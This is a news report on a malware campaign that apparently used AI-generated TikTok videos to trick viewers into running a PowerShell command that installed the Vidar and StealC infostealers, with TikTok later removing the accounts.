Cybercriminals Are Utilizing AI-Created TikTok Clips to Disperse Malware
A new and concerning trend in social engineering has surfaced on TikTok, with cybercriminals exploiting the platform’s widespread appeal to spread malware via misleading videos.
Cybersecurity specialists at Trend Micro have reported that attackers have initiated a “unique social engineering initiative” that employs TikTok videos to deceive users into installing harmful software. These clips, thought to be AI-generated, falsely guarantee complimentary access to premium applications such as Microsoft Windows, Microsoft Office, CapCut, and Spotify.
The scam operates by directing viewers to execute a straightforward PowerShell command, presented as a legitimate method for software activation. However, carrying out the command actually loads malware—specifically infostealers like Vidar and StealC—onto the individual’s device. This malware is designed to pilfer sensitive data such as passwords, browser history, and cryptocurrency wallet information.
Bleeping Computer noted that numerous videos promoting this scam had already accumulated hundreds of thousands of views.
PowerShell is a robust scripting language utilized for automating tasks on Windows devices. Due to its potential, it can pose significant risks if misused. Users are strongly recommended to exercise caution regarding any code or software suggestions encountered on social media sites like TikTok.
Trend Micro highlighted the complexity of this campaign in its findings, stating that the harmful instructions are communicated solely through visuals and audio. “The social engineering takes place within the video itself, rather than through identifiable code or scripts,” the report clarifies. “No malicious code is present on the platform for security solutions to scrutinize or block. All actionable content is conveyed visually and auditorily. Threat actors do this to try to circumvent existing detection methods, making it more challenging for defenders to identify and thwart these campaigns.”
While TikTok opted not to comment specifically on this threat, the company confirmed to Mashable that it has shut down the accounts associated with the campaign. Users concerned about scams and phishing efforts can find additional information and safety advice at the TikTok Safety Center.
Update: As of May 23, 2025, 5:22 p.m. EDT, this article has been revised to specify that the scam videos have been removed from the platform.